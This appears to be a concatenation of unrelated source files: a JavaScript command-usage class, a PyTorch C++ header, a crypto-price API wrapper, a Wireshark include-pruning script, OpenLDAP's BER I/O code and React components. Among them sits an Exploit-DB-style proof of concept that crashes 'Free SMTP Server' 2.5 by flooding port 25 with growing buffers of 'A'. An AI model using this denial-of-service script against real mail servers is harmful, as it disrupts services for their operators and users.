fullUsage(message) {
let { prefix } = message.guildSettings;
if (Array.isArray(prefix)) prefix = prefix.find(pre => message.prefix.test(pre)) || prefix[0];
return `${prefix.length !== 1 ? `${prefix} ` : prefix}${this.nearlyFullUsage}`;
}
/**
* Defines to string behavior of this class.
* @since 0.5.0
* @returns {string}
*/
toString() {
return this.nearlyFullUsage;
}
}
module.exports = CommandUsage;
|
#ifndef NNUTILS_H
#define NNUTILS_H
#include <torch/torch.h>
#include <vector>
bool is_empty(at::Tensor x);
/* Clips gradient norm of an iterable of parameters.
* The norm is computed over all gradients together, as if they were
* concatenated into a single vector. Gradients are modified in-place.
* Arguments:
* parameters (Iterable[Tensor] or Tensor): an iterable of Tensors or a
* single Tensor that will have gradients normalized
* max_norm (float or int): max norm of the gradients
* Returns:
* Total norm of the parameters (viewed as a single vector).
*/
void ClipGradNorm(std::vector<at::Tensor> parameters, float max_norm);
at::Tensor upsample(at::Tensor x, float scale_factor);
at::Tensor unique1d(at::Tensor tensor);
at::Tensor intersect1d(at::Tensor tensor1, at::Tensor tensor2);
class SamePad2dImpl : public torch::nn::Module {
public:
SamePad2dImpl();
SamePad2dImpl(uint32_t kernel_size, uint32_t stride);
torch::Tensor forward(torch::Tensor input);
private:
uint32_t kernel_size_{0};
uint32_t stride_{0};
};
TORCH_MODULE(SamePad2d);
#endif // NNUTILS_H
|
const request = require("../helpers/request");
const ApiUrls = require("../helpers/ApiUrls");
const parameterChecker = require("../helpers/parameterChecker");
const url = new ApiUrls();
const getCoinInfo = (params) => {
return request(url.contracts.GetCoinInfoByContractAddressAndId(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address"],["id","contract_addresses"]));
}
const getMarketChart = (params) => {
return request(url.contracts.GetMarketChart(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address","vs_currency","days"],["id","contract_addresses"]));
}
const getMarketChartRange = (params) => {
return request(url.contracts.GetMarketChartRange(params["id"],params["contract_address"]),parameterChecker(params,["id","contract_address","vs_currency","from","to"],["id","contract_addresses"]));
}
module.exports = {
getCoinInfo,
getMarketChart,
getMarketChartRange
}
|
#Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC)
# Date: February 3, 2009
# Exploit Author: Metin Kandemir (kandemir)
# Vendor Homepage: http://www.softstack.com/freesmtp.html
# Software Link: https://free-smtp-server.en.uptodown.com/windows/download
# Version: 2.5
# Tested on: Windows 7 Service Pack 1 x64
# Software Description : Free SMTP server program to send emails directly from PC.
# ==================================================================
# The SMTP Server will crash when this code is run on localhost.
import socket
a=1
buffer = ["A"]
while a <= 20000:
a = a+1
buffer.append("A"*a)
for string in buffer:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('127.0.0.1',25))
s.send(string)
|
#!/usr/bin/python
# Martin Mathieson
# Look for and removes unnecessary includes in .cpp or .c files
#
# Wireshark - Network traffic analyzer
# By Gerald Combs <gerald@wireshark.org>
# Copyright 1998 Gerald Combs
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
import subprocess
import os
import sys
import shutil
def show_usage():
print('Usage: ./delete_includes.py <dissectors | wsutil | wiretap | ui | qt | plugins > [start_file] [stop_file]')
# Work out wireshark folder based upon CWD. Assume run in wireshark folder
# or from tools folder...
wireshark_root = os.getcwd()
root,lastdir = os.path.split(wireshark_root)
if lastdir == 'tools':
wireshark_root = root
# Make command depends upon platform.
if sys.platform.startswith('win'):
default_make_command = ['msbuild', '/m', '/p:Configuration=RelWithDebInfo', 'Wireshark.sln']
else:
default_make_command = ['make']
# Set parameters based upon string passed as argument.
if len(sys.argv) > 1:
if sys.argv[1] == 'dissectors':
print('dissectors target chosen!')
test_folder = os.path.join(wireshark_root, 'epan', 'dissectors')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'wsutil':
print('wsutils target chosen!')
test_folder = os.path.join(wireshark_root, 'wsutil')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'wiretap':
print('wiretap target chosen!')
test_folder = os.path.join(wireshark_root, 'wiretap')
run_folder = test_folder
make_command = default_make_command
elif sys.argv[1] == 'ui':
print('ui target chosen!')
test_folder = os.path.join(wireshark_root, 'ui')
run_folder = wireshark_root
make_command = default_make_command
elif sys.argv[1] == 'qt':
print('qt target chosen!')
test_folder = os.path.join(wireshark_root, 'ui', 'qt')
run_folder = wireshark_root
default_make_command.append('qt')
make_command = default_make_command
elif sys.argv[1] == 'plugins':
print('plugins target chosen!')
test_folder = os.path.join(wireshark_root, 'plugins')
run_folder = os.path.join(wireshark_root, 'plugins')
make_command = default_make_command
else:
print('Unrecognised command line option %s' % sys.argv[1])
show_usage()
sys.exit()
else:
# Print usage and bug out!
show_usage()
sys.exit()
# i.e. not looking for a first file to begin testing, and haven't found last one yet.
first_file_found = True
last_file_found = False
# Optional 2nd arg gives first filename to use. Useful for long runs that may
# sometimes be stopped early
if len(sys.argv) > 2:
first_file_to_test = sys.argv[2]
first_file_found = False
# Optional 3rd arg gives last filename to use. Useful for long runs that may
# sometimes be stopped early
last_file_to_test = ''
if len(sys.argv) > 3:
last_file_to_test = sys.argv[3]
# A list of header files that it is not safe to uninclude, as doing so
# has been seen to cause link failures against implemented functions...
# TODO: some of these could probably be removed on more permissive platforms.
includes_to_keep = []
includes_to_keep.append('config.h')
includes_to_keep.append('epan/packet.h')
includes_to_keep.append('stdlib.h')
includes_to_keep.append('math.h')
includes_to_keep.append('errno.h')
includes_to_keep.append('string.h')
# These are probably mostly redundant in that they are now covered by the check
# for 'self-includes'...
includes_to_keep.append('x11-keysym.h')
includes_to_keep.append('packet-dcom-dispatch.h')
includes_to_keep.append('packet-ax25.h')
includes_to_keep.append('packet-atm.h')
includes_to_keep.append('packet-atalk.h')
includes_to_keep.append('packet-ppp.h')
includes_to_keep.append('packet-scsi-mmc.h')
includes_to_keep.append('packet-t30.h')
includes_to_keep.append('packet-tls.h')
# Stats
files_examined = 0
includes_tested = 0
includes_deleted = 0
files_not_built = 0
files_not_built_list = []
generated_files_ignored = []
skipped_before_first = 0
includes_to_keep_kept = 0
# We want to confirm that this file is actually built as part of the make target.
# To do this, add some garbage to the front of the file and confirm that the
# build then fails. If it doesn't, won't want to remove #includes from that file!
def test_file_is_built(root, filename):
temp_filename = filename + '.tmp'
f_read = open(filename, 'r')
write_filename = filename + '.new'
f_write = open(write_filename, 'w')
# Write the file with nonsense at start.
f_write.write('NO WAY THIS FILE BUILDS!!!!!')
# Copy remaining lines as-is.
for line in f_read:
f_write.write(line)
f_read.close()
f_write.close()
# Backup file, and do this build with the one we wrote.
shutil.copy(filename, temp_filename)
shutil.copy(write_filename, filename)
# Try the build.
os.chdir(run_folder)
result = subprocess.call(make_command)
# Restore proper file & delete temp files
os.chdir(root)
shutil.copy(temp_filename, filename)
os.remove(temp_filename)
os.remove(write_filename)
if result == 0:
# Build succeeded so this file wasn't in it
return False
else:
# Build failed so this file *is* part of it
return True
# Function to test removal of each #include from a file in turn.
# At the end, only those that appear to be needed will be left.
def test_file(root, filename):
print('')
print('------------------------------')
print('Testing %s' % filename)
temp_filename = filename + '.tmp'
# Test if file seems to be part of the build.
is_built = test_file_is_built(root, filename)
if not is_built:
print('***** File not used in build, so ignore!!!!')
global files_not_built
global files_not_built_list
files_not_built = files_not_built + 1
# TODO: should os.path.join with root before adding?
files_not_built_list.append(filename)
return
else:
print('This file is part of the build')
# OK, we are going to test removing includes from this file.
tested_line_number = 0
# Don't want to delete 'self-includes', so prepare filename.
module_name,extension = os.path.splitext(filename)
module_header = module_name + '.h'
# Loop around, finding all possible include lines to comment out
while (True):
have_deleted_line = False
result = 0
# Go into folder
os.chdir(root)
# Open read & write files
f_read = open(filename, 'r')
write_filename = filename + '.new'
f_write = open(write_filename, 'w')
# Walk the file again looking for another place to comment out an include
this_line_number = 1
hash_if_level = 0
for line in f_read:
this_line_deleted = False
# Maintain view of how many #if or #ifdefs we are in.
# Don't want to remove any includes that may not be active in this build.
if line.startswith('#if'):
hash_if_level = hash_if_level + 1
if line.startswith('#endif'):
if hash_if_level > 1:
hash_if_level = hash_if_level - 1
# Consider deleting this line have haven't already reached.
if (not have_deleted_line and (tested_line_number < this_line_number)):
# Test line for starting with #include, and eligible for deletion.
if line.startswith('#include ') and hash_if_level == 0 and line.find(module_header) == -1:
# Check that this isn't a header file that known unsafe to uninclude.
allowed_to_delete = True
global includes_to_keep
for entry in includes_to_keep:
if line.find(entry) != -1:
allowed_to_delete = False
global includes_to_keep_kept
includes_to_keep_kept = includes_to_keep_kept + 1
continue
if allowed_to_delete:
# OK, actually doing it.
have_deleted_line = True
this_line_deleted = True
tested_line_number = this_line_number
# Write line to output file, unless this very one was deleted.
if not this_line_deleted:
f_write.write(line)
this_line_number = this_line_number + 1
# Close both files.
f_read.close()
f_write.close()
# If we commented out a line, try to build file without it.
if (have_deleted_line):
# Test a build. 0 means success, others are failures.
shutil.copy(filename, temp_filename)
shutil.copy(write_filename, filename)
# Assuming Makefile is in root of test folder, need to go there to do make!
os.chdir(run_folder)
result = subprocess.call(make_command)
if result == 0:
print('***** Good build')
# Line was eliminated so decrement line counter
tested_line_number = tested_line_number - 1
# Inc successes counter
global includes_deleted
includes_deleted = includes_deleted + 1
# Good - promote this version by leaving it here!
# Occasionally fails so delete this file each time.
# TODO: this is very particular to dissector target...
if sys.argv[1] == 'dissectors':
os.remove(os.path.join(run_folder, 'vc100.pdb'))
else:
print('***** Bad build')
# Never mind, go back to previous building version
os.chdir(root)
shutil.copy(temp_filename, filename)
# Inc counter of tried
global includes_tested
includes_tested = includes_tested + 1
else:
# Reached the end of the file without making changes, so nothing doing.
# Delete temporary files
if os.path.isfile(temp_filename):
os.remove(temp_filename)
if os.path.isfile(write_filename):
os.remove(write_filename)
return
# Test for whether a the given file is under source control
def under_version_control(filename):
# TODO: is there a git module to allow testing like pysvn? Else actually
# shell out command-line 'git' and check output...?
return True
# Test for whether the given file was automatically generated.
def generated_file(filename):
# Special known case.
if filename == 'register.c':
return True
# Open file
f_read = open(filename, 'r')
lines_tested = 0
for line in f_read:
# The comment to say that its generated is near the top, so give up once
# get a few lines down.
if lines_tested > 10:
f_read.close()
return False
if line.find('Generated automatically') != -1 or line.find('Autogenerated from') != -1 or line.find('is autogenerated') != -1 or line.find('automatically generated by Pidl') != -1 or line.find('Created by: The Qt Meta Object Compiler') != -1:
f_read.close()
# This file was generated.
global generated_files_ignored
generated_files_ignored.append(filename)
return True
lines_tested = lines_tested + 1
# OK, looks like a hand-written file!
f_read.close()
return False
######################################################################################
# MAIN PROGRAM STARTS HERE
######################################################################################
# First, confirm that the build is currently passing, if not give up now.
print('chdir into %s' % run_folder)
os.chdir(run_folder)
print('***** Doing an initial build to check we have a stable base.')
result = subprocess.call(make_command)
if result != 0:
print('***** Initial build failed - give up now!!!!')
exit (-1)
# OK, loop over files in test_folder and see what can be removed from each one
for root, subFolders, files in os.walk(test_folder):
for filename in files:
# Don't look for source files in folders containing a . (i.e. avoid .svn, .git)
if (root.find('.') == -1):
# Only looking for c/cpp files - changing header files would make each
# attempted build take much longer
if filename.endswith(".c") or filename.endswith(".cpp"):
os.chdir(root)
# May be waiting for first file to test - check.
if not first_file_found:
if first_file_to_test == filename:
first_file_found = True
# May be waiting for last file to test - check.
if not last_file_found:
if last_file_to_test == filename:
last_file_found = True
# Also want to filter out generated files that are not checked in.
if not generated_file(filename) and under_version_control(filename) and first_file_found and not last_file_found:
# OK, try this file
test_file(root, filename)
# Inc counter
files_examined = files_examined + 1
else:
if generated_file(filename):
reason = 'generated file...'
if not under_version_control(filename):
reason = 'not under source control'
if not first_file_found:
reason = 'not seen starting file', first_file_to_test, 'yet'
skipped_before_first = skipped_before_first + 1
print('Ignoring %s: %s' % (filename, reason))
# Show summary stats of run
print('\n\n')
print('Summary')
print('=========')
print('files examined: %d' % files_examined)
print('includes tested: %d' % includes_tested)
print('includes deleted: %d' % includes_deleted)
print('files not built: %d' % files_not_built)
for abandoned_file in files_not_built_list:
print(' %s' % abandoned_file)
print('%d generated files not tested:' % len(generated_files_ignored))
for generated_file in generated_files_ignored:
print(' %s' % generated_file)
print('includes kept as not safe to remove: %d' % includes_to_keep_kept)
print('skipped before first: %d' % skipped_before_first)
|
/* io.c - ber general i/o routines */
/* $OpenLDAP$ */
/* This work is part of OpenLDAP Software <http://www.openldap.org/>.
*
* Copyright 1998-2021 The OpenLDAP Foundation.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted only as authorized by the OpenLDAP
* Public License.
*
* A copy of this license is available in the file LICENSE in the
* top-level directory of the distribution or, alternatively, at
* <http://www.OpenLDAP.org/license.html>.
*/
/* Portions Copyright (c) 1990 Regents of the University of Michigan.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that this notice is preserved and that due credit is given
* to the University of Michigan at Ann Arbor. The name of the University
* may not be used to endorse or promote products derived from this
* software without specific prior written permission. This software
* is provided ``as is'' without express or implied warranty.
*/
/* ACKNOWLEDGEMENTS:
* This work was originally developed by the University of Michigan
* (as part of U-MICH LDAP).
*/
#include "portable.h"
#include <stdio.h>
#include <ac/stdlib.h>
#include <ac/ctype.h>
#include <ac/errno.h>
#include <ac/socket.h>
#include <ac/string.h>
#include <ac/unistd.h>
#ifdef HAVE_IO_H
#include <io.h>
#endif
#include "lber-int.h"
#include "ldap_log.h"
ber_slen_t
ber_skip_data(
BerElement *ber,
ber_len_t len )
{
ber_len_t actuallen, nleft;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
nleft = ber_pvt_ber_remaining( ber );
actuallen = nleft < len ? nleft : len;
ber->ber_ptr += actuallen;
ber->ber_tag = *(unsigned char *)ber->ber_ptr;
return( (ber_slen_t) actuallen );
}
/*
* Read from the ber buffer. The caller must maintain ber->ber_tag.
* Do not use to read whole tags. See ber_get_tag() and ber_skip_data().
*/
ber_slen_t
ber_read(
BerElement *ber,
char *buf,
ber_len_t len )
{
ber_len_t actuallen, nleft;
assert( ber != NULL );
assert( buf != NULL );
assert( LBER_VALID( ber ) );
nleft = ber_pvt_ber_remaining( ber );
actuallen = nleft < len ? nleft : len;
AC_MEMCPY( buf, ber->ber_ptr, actuallen );
ber->ber_ptr += actuallen;
return( (ber_slen_t) actuallen );
}
/*
* Write to the ber buffer.
* Note that ber_start_seqorset/ber_put_seqorset() bypass ber_write().
*/
ber_slen_t
ber_write(
BerElement *ber,
LDAP_CONST char *buf,
ber_len_t len,
int zero ) /* nonzero is unsupported from OpenLDAP 2.4.18 */
{
char **p;
assert( ber != NULL );
assert( buf != NULL );
assert( LBER_VALID( ber ) );
if ( zero != 0 ) {
ber_log_printf( LDAP_DEBUG_ANY, ber->ber_debug, "%s",
"ber_write: nonzero 4th argument not supported\n" );
return( -1 );
}
p = ber->ber_sos_ptr == NULL ? &ber->ber_ptr : &ber->ber_sos_ptr;
if ( len > (ber_len_t) (ber->ber_end - *p) ) {
if ( ber_realloc( ber, len ) != 0 ) return( -1 );
}
AC_MEMCPY( *p, buf, len );
*p += len;
return( (ber_slen_t) len );
}
/* Resize the ber buffer */
int
ber_realloc( BerElement *ber, ber_len_t len )
{
ber_len_t total, offset, sos_offset, rw_offset;
char *buf;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
/* leave room for ber_flatten() to \0-terminate ber_buf */
if ( ++len == 0 ) {
return( -1 );
}
total = ber_pvt_ber_total( ber );
#define LBER_EXBUFSIZ 4060 /* a few words less than 2^N for binary buddy */
#if defined( LBER_EXBUFSIZ ) && LBER_EXBUFSIZ > 0
# ifndef notdef
/* don't realloc by small amounts */
total += len < LBER_EXBUFSIZ ? LBER_EXBUFSIZ : len;
# else
{ /* not sure what value this adds. reduce fragmentation? */
ber_len_t have = (total + (LBER_EXBUFSIZE - 1)) / LBER_EXBUFSIZ;
ber_len_t need = (len + (LBER_EXBUFSIZ - 1)) / LBER_EXBUFSIZ;
total = ( have + need ) * LBER_EXBUFSIZ;
}
# endif
#else
total += len; /* realloc just what's needed */
#endif
if ( total < len || total > (ber_len_t)-1 / 2 /* max ber_slen_t */ ) {
return( -1 );
}
buf = ber->ber_buf;
offset = ber->ber_ptr - buf;
sos_offset = ber->ber_sos_ptr ? ber->ber_sos_ptr - buf : 0;
/* if ber_sos_ptr != NULL, it is > ber_buf so that sos_offset > 0 */
rw_offset = ber->ber_rwptr ? ber->ber_rwptr - buf : 0;
buf = (char *) ber_memrealloc_x( buf, total, ber->ber_memctx );
if ( buf == NULL ) {
return( -1 );
}
ber->ber_buf = buf;
ber->ber_end = buf + total;
ber->ber_ptr = buf + offset;
if ( sos_offset )
ber->ber_sos_ptr = buf + sos_offset;
if ( ber->ber_rwptr )
ber->ber_rwptr = buf + rw_offset;
return( 0 );
}
void
ber_free_buf( BerElement *ber )
{
assert( LBER_VALID( ber ) );
if ( ber->ber_buf) ber_memfree_x( ber->ber_buf, ber->ber_memctx );
ber->ber_buf = NULL;
ber->ber_sos_ptr = NULL;
ber->ber_valid = LBER_UNINITIALIZED;
}
void
ber_free( BerElement *ber, int freebuf )
{
if( ber == NULL ) {
LDAP_MEMORY_DEBUG_ASSERT( ber != NULL );
return;
}
if( freebuf ) ber_free_buf( ber );
ber_memfree_x( (char *) ber, ber->ber_memctx );
}
int
ber_flush( Sockbuf *sb, BerElement *ber, int freeit )
{
return ber_flush2( sb, ber,
freeit ? LBER_FLUSH_FREE_ON_SUCCESS
: LBER_FLUSH_FREE_NEVER );
}
int
ber_flush2( Sockbuf *sb, BerElement *ber, int freeit )
{
ber_len_t towrite;
ber_slen_t rc;
assert( sb != NULL );
assert( ber != NULL );
assert( SOCKBUF_VALID( sb ) );
assert( LBER_VALID( ber ) );
if ( ber->ber_rwptr == NULL ) {
ber->ber_rwptr = ber->ber_buf;
}
towrite = ber->ber_ptr - ber->ber_rwptr;
if ( sb->sb_debug ) {
ber_log_printf( LDAP_DEBUG_TRACE, sb->sb_debug,
"ber_flush2: %ld bytes to sd %ld%s\n",
towrite, (long) sb->sb_fd,
ber->ber_rwptr != ber->ber_buf ? " (re-flush)" : "" );
ber_log_bprint( LDAP_DEBUG_BER, sb->sb_debug,
ber->ber_rwptr, towrite );
}
while ( towrite > 0 ) {
#ifdef LBER_TRICKLE
sleep(1);
rc = ber_int_sb_write( sb, ber->ber_rwptr, 1 );
#else
rc = ber_int_sb_write( sb, ber->ber_rwptr, towrite );
#endif
if ( rc <= 0 ) {
if ( freeit & LBER_FLUSH_FREE_ON_ERROR ) ber_free( ber, 1 );
return -1;
}
towrite -= rc;
ber->ber_rwptr += rc;
}
if ( freeit & LBER_FLUSH_FREE_ON_SUCCESS ) ber_free( ber, 1 );
return 0;
}
BerElement *
ber_alloc_t( int options )
{
BerElement *ber;
ber = (BerElement *) LBER_CALLOC( 1, sizeof(BerElement) );
if ( ber == NULL ) {
return NULL;
}
ber->ber_valid = LBER_VALID_BERELEMENT;
ber->ber_tag = LBER_DEFAULT;
ber->ber_options = options;
ber->ber_debug = ber_int_debug;
assert( LBER_VALID( ber ) );
return ber;
}
BerElement *
ber_alloc( void ) /* deprecated */
{
return ber_alloc_t( 0 );
}
BerElement *
der_alloc( void ) /* deprecated */
{
return ber_alloc_t( LBER_USE_DER );
}
BerElement *
ber_dup( BerElement *ber )
{
BerElement *new;
assert( ber != NULL );
assert( LBER_VALID( ber ) );
if ( (new = ber_alloc_t( ber->ber_options )) == NULL ) {
return NULL;
}
*new = *ber;
assert( LBER_VALID( new ) );
return( new );
}
void
ber_init2( BerElement *ber, struct berval *bv, int options )
{
assert( ber != NULL );
(void) memset( (char *)ber, '\0', sizeof( BerElement ));
ber->ber_valid = LBER_VALID_BERELEMENT;
ber->ber_tag = LBER_DEFAULT;
ber->ber_options = (char) options;
ber->ber_debug = ber_int_debug;
if ( bv != NULL ) {
ber->ber_buf = bv->bv_val;
ber->ber_ptr = ber->ber_buf;
ber->ber_end = ber->ber_buf + bv->bv_len;
}
assert( LBER_VALID( ber ) );
}
/* OLD U-Mich ber_init() */
void
ber_init_w_nullc( BerElement *ber, int options )
{
ber_init2( ber, NULL, options );
}
/* New C-API ber_init() */
/* This function constructs a BerElement containing a copy
** of the data in the bv argument.
*/
BerElement *
ber_init( struct berval *bv )
{
BerElement *ber;
assert( bv != NULL );
if ( bv == NULL ) {
return NULL;
}
ber = ber_alloc_t( 0 );
if( ber == NULL ) {
/* allocation failed */
return NULL;
}
/* copy the data */
if ( ((ber_len_t) ber_write ( ber, bv->bv_val, bv->bv_len, 0 ))
!= bv->bv_len )
{
/* write failed, so free and return NULL */
ber_free( ber, 1 );
return NULL;
}
ber_reset( ber, 1 ); /* reset the pointer to the start of the buffer */
return ber;
}
/* New C-API ber_flatten routine */
/* This routine allocates a struct berval whose contents are a BER
** encoding taken from the ber argument. The bvPtr pointer points to
** the returned berval.
**
** ber_flatten2 is the same, but uses a struct berval passed by
** the caller. If alloc is 0 the returned bv uses the ber buf directly.
*/
int ber_flatten2(
BerElement *ber,
struct berval *bv,
int alloc )
{
assert( bv != NULL );
if ( bv == NULL ) {
return -1;
}
if ( ber == NULL ) {
/* ber is null, create an empty berval */
bv->bv_val = NULL;
bv->bv_len = 0;
} else if ( ber->ber_sos_ptr != NULL ) {
/* unmatched "{" and "}" */
return -1;
} else {
/* copy the berval */
ber_len_t len = ber_pvt_ber_write( ber );
if ( alloc ) {
bv->bv_val = (char *) ber_memalloc_x( len + 1, ber->ber_memctx );
if ( bv->bv_val == NULL ) {
return -1;
}
AC_MEMCPY( bv->bv_val, ber->ber_buf, len );
bv->bv_val[len] = '\0';
} else if ( ber->ber_buf != NULL ) {
bv->bv_val = ber->ber_buf;
bv->bv_val[len] = '\0';
} else {
bv->bv_val = "";
}
bv->bv_len = len;
}
return 0;
}
int ber_flatten(
BerElement *ber,
struct berval **bvPtr)
{
struct berval *bv;
int rc;
assert( bvPtr != NULL );
if(bvPtr == NULL) {
return -1;
}
bv = ber_memalloc_x( sizeof(struct berval), ber->ber_memctx );
if ( bv == NULL ) {
return -1;
}
rc = ber_flatten2(ber, bv, 1);
if (rc == -1) {
ber_memfree_x(bv, ber->ber_memctx);
} else {
*bvPtr = bv;
}
return rc;
}
void
ber_reset( BerElement *ber, int was_writing )
{
assert( ber != NULL );
assert( LBER_VALID( ber ) );
if ( was_writing ) {
ber->ber_end = ber->ber_ptr;
ber->ber_ptr = ber->ber_buf;
} else {
ber->ber_ptr = ber->ber_end;
}
ber->ber_rwptr = NULL;
}
/*
* A rewrite of ber_get_next that can safely be called multiple times
* for the same packet. It will simply continue where it stopped until
* a full packet is read.
*/
#define LENSIZE 4
ber_tag_t
ber_get_next(
Sockbuf *sb,
ber_len_t *len,
BerElement *ber )
{
assert( sb != NULL );
assert( len != NULL );
assert( ber != NULL );
assert( SOCKBUF_VALID( sb ) );
assert( LBER_VALID( ber ) );
if ( ber->ber_debug & LDAP_DEBUG_TRACE ) {
ber_log_printf( LDAP_DEBUG_TRACE, ber->ber_debug,
"ber_get_next\n" );
}
/*
* Any ber element looks like this: tag length contents.
* Assuming everything's ok, we return the tag byte (we
* can assume a single byte), return the length in len,
* and the rest of the undecoded element in buf.
*
* Assumptions:
* 1) small tags (less than 128)
* 2) definite lengths
* 3) primitive encodings used whenever possible
*
* The code also handles multi-byte tags. The first few bytes
* of the message are read to check for multi-byte tags and
* lengths. These bytes are temporarily stored in the ber_tag,
* ber_len, and ber_usertag fields of the berelement until
* tag/len parsing is complete. After this parsing, any leftover
* bytes and the rest of the message are copied into the ber_buf.
*
* We expect tag and len to be at most 32 bits wide.
*/
if (ber->ber_rwptr == NULL) {
assert( ber->ber_buf == NULL );
ber->ber_rwptr = (char *) &ber->ber_len-1;
ber->ber_ptr = ber->ber_rwptr;
ber->ber_tag = 0;
}
while (ber->ber_rwptr > (char *)&ber->ber_tag && ber->ber_rwptr <
(char *)&ber->ber_len + LENSIZE*2) {
ber_slen_t sblen;
char buf[sizeof(ber->ber_len)-1];
ber_len_t tlen = 0;
/* The tag & len can be at most 9 bytes; we try to read up to 8 here */
sock_errset(0);
sblen=((char *)&ber->ber_len + LENSIZE*2 - 1)-ber->ber_rwptr;
/* Trying to read the last len byte of a 9 byte tag+len */
if (sblen<1)
sblen = 1;
sblen=ber_int_sb_read( sb, ber->ber_rwptr, sblen );
if (sblen<=0) return LBER_DEFAULT;
ber->ber_rwptr += sblen;
/* We got at least one byte, try to parse the tag. */
if (ber->ber_ptr == (char *)&ber->ber_len-1) {
ber_tag_t tag;
unsigned char *p = (unsigned char *)ber->ber_ptr;
tag = *p++;
if ((tag & LBER_BIG_TAG_MASK) == LBER_BIG_TAG_MASK) {
ber_len_t i;
for (i=1; (char *)p<ber->ber_rwptr; i++) {
tag <<= 8;
tag |= *p++;
if (!(tag & LBER_MORE_TAG_MASK))
break;
/* Is the tag too big? */
if (i == sizeof(ber_tag_t)-1) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
}
/* Did we run out of bytes? */
if ((char *)p == ber->ber_rwptr) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
}
ber->ber_tag = tag;
ber->ber_ptr = (char *)p;
}
if ( ber->ber_ptr == ber->ber_rwptr ) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
/* Now look for the length */
if (*ber->ber_ptr & 0x80) { /* multi-byte */
int i;
unsigned char *p = (unsigned char *)ber->ber_ptr;
int llen = *p++ & 0x7f;
if (llen > LENSIZE) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
/* Not enough bytes? */
if (ber->ber_rwptr - (char *)p < llen) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
for (i=0; i<llen; i++) {
tlen <<=8;
tlen |= *p++;
}
ber->ber_ptr = (char *)p;
} else {
tlen = *(unsigned char *)ber->ber_ptr++;
}
/* Are there leftover data bytes inside ber->ber_len? */
if (ber->ber_ptr < (char *)&ber->ber_usertag) {
if (ber->ber_rwptr < (char *)&ber->ber_usertag) {
sblen = ber->ber_rwptr - ber->ber_ptr;
} else {
sblen = (char *)&ber->ber_usertag - ber->ber_ptr;
}
AC_MEMCPY(buf, ber->ber_ptr, sblen);
ber->ber_ptr += sblen;
} else {
sblen = 0;
}
ber->ber_len = tlen;
/* now fill the buffer. */
/* make sure length is reasonable */
if ( ber->ber_len == 0 ) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
if ( sb->sb_max_incoming && ber->ber_len > sb->sb_max_incoming ) {
ber_log_printf( LDAP_DEBUG_CONNS, ber->ber_debug,
"ber_get_next: sockbuf_max_incoming exceeded "
"(%ld > %ld)\n", ber->ber_len, sb->sb_max_incoming );
sock_errset(ERANGE);
return LBER_DEFAULT;
}
if (ber->ber_buf==NULL) {
ber_len_t l = ber->ber_rwptr - ber->ber_ptr;
/* ber->ber_ptr is always <= ber->ber->ber_rwptr.
* make sure ber->ber_len agrees with what we've
* already read.
*/
if ( ber->ber_len < sblen + l ) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
ber->ber_buf = (char *) ber_memalloc_x( ber->ber_len + 1, ber->ber_memctx );
if (ber->ber_buf==NULL) {
return LBER_DEFAULT;
}
ber->ber_end = ber->ber_buf + ber->ber_len;
if (sblen) {
AC_MEMCPY(ber->ber_buf, buf, sblen);
}
if (l > 0) {
AC_MEMCPY(ber->ber_buf + sblen, ber->ber_ptr, l);
sblen += l;
}
*ber->ber_end = '\0';
ber->ber_ptr = ber->ber_buf;
ber->ber_usertag = 0;
if ((ber_len_t)sblen == ber->ber_len) {
goto done;
}
ber->ber_rwptr = ber->ber_buf + sblen;
}
}
if ((ber->ber_rwptr>=ber->ber_buf) && (ber->ber_rwptr<ber->ber_end)) {
ber_slen_t res;
ber_slen_t to_go;
to_go = ber->ber_end - ber->ber_rwptr;
/* unsigned/signed overflow */
if (to_go<0) return LBER_DEFAULT;
sock_errset(0);
res = ber_int_sb_read( sb, ber->ber_rwptr, to_go );
if (res<=0) return LBER_DEFAULT;
ber->ber_rwptr+=res;
if (res<to_go) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
done:
ber->ber_rwptr = NULL;
*len = ber->ber_len;
if ( ber->ber_debug ) {
ber_log_printf( LDAP_DEBUG_TRACE, ber->ber_debug,
"ber_get_next: tag 0x%lx len %ld contents:\n",
ber->ber_tag, ber->ber_len );
ber_log_dump( LDAP_DEBUG_BER, ber->ber_debug, ber, 1 );
}
return (ber->ber_tag);
}
/* invalid input */
return LBER_DEFAULT;
}
char *
ber_start( BerElement* ber )
{
return ber->ber_buf;
}
int
ber_len( BerElement* ber )
{
return ( ber->ber_end - ber->ber_buf );
}
int
ber_ptrlen( BerElement* ber )
{
return ( ber->ber_ptr - ber->ber_buf );
}
void
ber_rewind ( BerElement * ber )
{
ber->ber_rwptr = NULL;
ber->ber_sos_ptr = NULL;
ber->ber_end = ber->ber_ptr;
ber->ber_ptr = ber->ber_buf;
#if 0 /* TODO: Should we add this? */
ber->ber_tag = LBER_DEFAULT;
ber->ber_usertag = 0;
#endif
}
int
ber_remaining( BerElement * ber )
{
return ber_pvt_ber_remaining( ber );
}
|
import axios from 'axios'
import React, { Component } from 'react'
import ApiData from './ApiData'
export class Home extends Component {
constructor() {
super()
this.state = {
apiData:[],
showData:false,
massege:"",
showMassege:false
}
}
componentDidMount = async ()=>{
const url = "http://localhost:8000/retreive"
const responsData = await axios(url);
this.setState({
apiData:responsData.data,
showData:true,
})
}
addFaviorate =async(item)=>{
const saveToDb =await axios("http://localhost:8000/create");
this.setState({
massege:saveToDb
})
}
render() {
console.log(this.state.apiData);
return (
<>
{this.state.showData &&
<ApiData
apiData={this.state.apiData}
/>}
</>
)
}
}
export default Home
|
import React from 'react'
import styles from './Control.module.scss'
import clsx from 'clsx'
